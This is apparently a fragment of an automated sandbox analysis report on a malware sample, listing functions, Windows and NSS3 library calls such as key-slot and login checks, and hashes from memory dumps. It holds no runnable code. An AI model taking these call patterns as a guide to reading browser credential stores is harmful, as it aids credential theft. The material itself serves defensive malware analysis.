PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CE7CD93,?,?,?,?,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF78

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: a591612c1d87af136a4ca91608feeaae4f25f195c1bb96ff87306418874db683
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 8911A2A5B003045BEB24AEA66C52BABB5FC9F5454DF24403DEC19D7B41FB60DA08C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE28C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE28C1B
EnterCriticalSection.KERNEL32 ref: 6CE28C34
PL_ArenaAllocate.NSS3 ref: 6CE28C65
PR_Unlock.NSS3 ref: 6CE28C9C
PR_Unlock.NSS3 ref: 6CE28CB6

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

Strings

KRAM, xrefs: 6CE28C8F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 8f58945e71a949fcbd149ffdb7de68fca00cd581cb90e2f73db24f4f073d7c65
Instruction ID: 39a16bcc1b91b2706659a351865ec327753bf3385d3b332192b5157868ba2dac
Opcode Fuzzy Hash: 8f58945e71a949fcbd149ffdb7de68fca00cd581cb90e2f73db24f4f073d7c65
Instruction Fuzzy Hash: 1921B7B1A156018FD700AF78C485669FBF4FF45308F25896ED888CB701DB39D886CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE1AD90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CE13FFF,00000000,?,?,?,?,?,6CE11A1C,00000000,00000000), ref: 6CE1ADA7

Part of subcall function 6CE714C0: TlsGetValue.KERNEL32 ref: 6CE714E0
Part of subcall function 6CE714C0: EnterCriticalSection.KERNEL32 ref: 6CE714F5
Part of subcall function 6CE714C0: PR_Unlock.NSS3 ref: 6CE7150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CE13FFF,00000000,?,?,?,?,?,6CE11A1C,00000000,00000000), ref: 6CE1ADB4

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CE13FFF,?,?,?,?,6CE13FFF,00000000,?,?,?,?,?,6CE11A1C,00000000), ref: 6CE1ADD5

Part of subcall function 6CE6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CE68D2D,?,00000000,?), ref: 6CE6FB85
Part of subcall function 6CE6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CE6FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CF394B0,?,?,?,?,?,?,?,?,6CE13FFF,00000000,?), ref: 6CE1ADEC

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE13FFF), ref: 6CE1AE3C

Strings

5s/, xrefs: 6CE1AD9C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID: 5s/
API String ID: 2372449006-340167759
Opcode ID: 417c475ffdc537b181796c484bd339a747c7c2cc3e68d6426d9ccacf6bfb3fe7
Instruction ID: eb38f3e8b4da7ce04be9b1a1271cc8cec03b2926eacb726c987dcd71bd4104cb
Opcode Fuzzy Hash: 417c475ffdc537b181796c484bd339a747c7c2cc3e68d6426d9ccacf6bfb3fe7
Instruction Fuzzy Hash: CE112672E043156BE7109A659C41BFF73B8DF9124CF24422CEC5996B41FB20E96DC2E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CE52E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE24F1C), ref: 6CE38EA2

Part of subcall function 6CE5F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CE5F854
Part of subcall function 6CE5F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CE5F868
Part of subcall function 6CE5F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CE5F882
Part of subcall function 6CE5F820: free.MOZGLUE(04C483FF,?,?), ref: 6CE5F889
Part of subcall function 6CE5F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CE5F8A4
Part of subcall function 6CE5F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CE5F8AB
Part of subcall function 6CE5F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CE5F8C9
Part of subcall function 6CE5F820: free.MOZGLUE(280F10EC,?,?), ref: 6CE5F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CE52E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE24F1C), ref: 6CE38EC3
TlsGetValue.KERNEL32(?,?,?,6CE52E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE24F1C), ref: 6CE38EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CE52E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CE38EF1
PR_Unlock.NSS3 ref: 6CE38F20

Strings

b.l, xrefs: 6CE38E96, 6CE38F25

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.l
API String ID: 1978757487-3749612370
Opcode ID: 50fa395e43173a89539a2325680b7dd1286c53652587e5517bc10935d153a470
Instruction ID: 06b36e05f63c804776da849d0b07b9707699aca5b0ab13d87e149d6f85b1237b
Opcode Fuzzy Hash: 50fa395e43173a89539a2325680b7dd1286c53652587e5517bc10935d153a470
Instruction Fuzzy Hash: CF216B709096259BCB10AF29D8842A9BBF0BF48318F51556FE898DBB41DB34F854CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF22C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CF22CA0
PR_ExitMonitor.NSS3 ref: 6CF22CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CF22CD1
strdup.MOZGLUE(?), ref: 6CF22CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CF22D27

Strings

Loaded library %s (static lib), xrefs: 6CF22D22

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 8e4efe26c032bb83fbb94e92884680228230a6c0ba58011093107d76c07f0d55
Instruction ID: 491742389efa7506f3ca97b99cc95c32fbd4a4ef8c682794506ab22e1a974312
Opcode Fuzzy Hash: 8e4efe26c032bb83fbb94e92884680228230a6c0ba58011093107d76c07f0d55
Instruction Fuzzy Hash: 0D1134B1B212209FEB418F55EC58B6A77B4AB4532DF64803DD809C7B01D73AE808CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE168E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE168FB
EnterCriticalSection.KERNEL32 ref: 6CE16913
PORT_FreeArena_Util.NSS3 ref: 6CE1693E
PR_Unlock.NSS3 ref: 6CE16946
DeleteCriticalSection.KERNEL32 ref: 6CE16951
free.MOZGLUE ref: 6CE1695D
PR_Unlock.NSS3 ref: 6CE16968

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: b9edd3ad64e72e994d6dd6d842011ac14ba737050bafd2bc927d193161d11ea5
Instruction ID: 366c07428ab64e61d23fad25c48be3a59b0f9eaa5c5d59aabe632e494f0fe5dc
Opcode Fuzzy Hash: b9edd3ad64e72e994d6dd6d842011ac14ba737050bafd2bc927d193161d11ea5
Instruction Fuzzy Hash: B7116DB1A187448BDB00AF79C08456DBBF8FF02248F11452CD898DB701EB30D498CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE70FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016

Part of subcall function 6CED98D0: calloc.MOZGLUE(00000001,00000084,6CE00936,00000001,?,6CE0102C), ref: 6CED98E5

PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B
TlsGetValue.KERNEL32(00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71044
free.MOZGLUE(00000000,?,00000800,6CE0EF74,00000000), ref: 6CE71064

Strings

security, xrefs: 6CE71025

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: e1f8e2dc7038cb41d660dd6580e89a040a5d3f6d640758fcaad7908d2f88632d
Instruction ID: e2a8fd6b27763dc1973110205d05f0e86f0689ecaa158a1d24db02880f3487e9
Opcode Fuzzy Hash: e1f8e2dc7038cb41d660dd6580e89a040a5d3f6d640758fcaad7908d2f88632d
Instruction Fuzzy Hash: 9B012530A203909BEB702FA99C18B563A78AF4374DF210119E85CA6A52EB61C155DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE22E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CE12D1A), ref: 6CE22E7E

Part of subcall function 6CE707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE18298,?,?,?,6CE0FCE5,?), ref: 6CE707BF
Part of subcall function 6CE707B0: PL_HashTableLookup.NSS3(?,?), ref: 6CE707E6
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE7081B
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE70825

PR_Now.NSS3 ref: 6CE22EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CE22EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CE12D1A), ref: 6CE22F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CE12D1A), ref: 6CE22F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CE22F81

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 3cc89bdd2b245ab52351b83d71f75f231ee00ed85844a9cf0ff03a3ac074e1e6
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: D531457192110087F730C625CC4ABAE7275EFA133CF744579D129A7AD0EB3D9886C622

Uniqueness

Uniqueness Score: -1.00%

Function 6CE10E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CE10A2C), ref: 6CE10E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CE10A2C), ref: 6CE10E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CE10A2C), ref: 6CE10E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CE10A2C), ref: 6CE10E90
free.MOZGLUE(00000000), ref: 6CE10EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CE10A2C), ref: 6CE10ED9

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: c0e4720083493947d783fe1873f2937a46092a839bbfc522508335fea8636a72
Instruction ID: 8a859242c3a409f5b75eeac2c7c492987fa2b6ae47d0c48c027d48231a97d731
Opcode Fuzzy Hash: c0e4720083493947d783fe1873f2937a46092a839bbfc522508335fea8636a72
Instruction Fuzzy Hash: 1E214CB2F082844BEF1049679C45B6B76BEDBC274CF390035D81993F02EA60C83583A2

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6CE288D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE30725,00000000,00000058), ref: 6CE28906
EnterCriticalSection.KERNEL32(?), ref: 6CE2891A
PL_ArenaAllocate.NSS3(?,?), ref: 6CE2894A
calloc.MOZGLUE(00000001,6CE3072D,00000000,00000000,00000000,?,6CE30725,00000000,00000058), ref: 6CE28959
memset.VCRUNTIME140(?,00000000,?), ref: 6CE28993
PR_Unlock.NSS3(?), ref: 6CE289AF

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 6b9ee46ce4cb0ba8b115df97a1b8ca65ec4047227bcfc7b450d2bd748ebb6557
Instruction ID: 6a3c3e45292db4c66e6d96d2c03ce380f2879f0aaf7f156cf44604d4acf712b3
Opcode Fuzzy Hash: 6b9ee46ce4cb0ba8b115df97a1b8ca65ec4047227bcfc7b450d2bd748ebb6557
Instruction Fuzzy Hash: F531E173E00215ABD7109F28CC41B59B7B8AF4631CF29962AEC5C9BB41E736E845C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDFC4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CDFC4F0
free.MOZGLUE ref: 6CDFC51A
TlsSetValue.KERNEL32 ref: 6CDFC540
free.MOZGLUE ref: 6CDFC557
DeleteCriticalSection.KERNEL32 ref: 6CDFC56A
free.MOZGLUE ref: 6CDFC576

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: e849831a69e7c4ae7a28a6a3109625981ae95e83311da72dfaf760e917adc695
Instruction ID: 65a339fbac4078b81711b40b8d335ecd78771a9eae0abeda473dea67db60f310
Opcode Fuzzy Hash: e849831a69e7c4ae7a28a6a3109625981ae95e83311da72dfaf760e917adc695
Instruction Fuzzy Hash: 5B115170A14B418BCB21BF79C04826EBFF4BF85748F06491DD8EA87710EB349059CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(04147DF8,?,?,?,0040F76C,?,04147DF8,00000000), ref: 0041596C
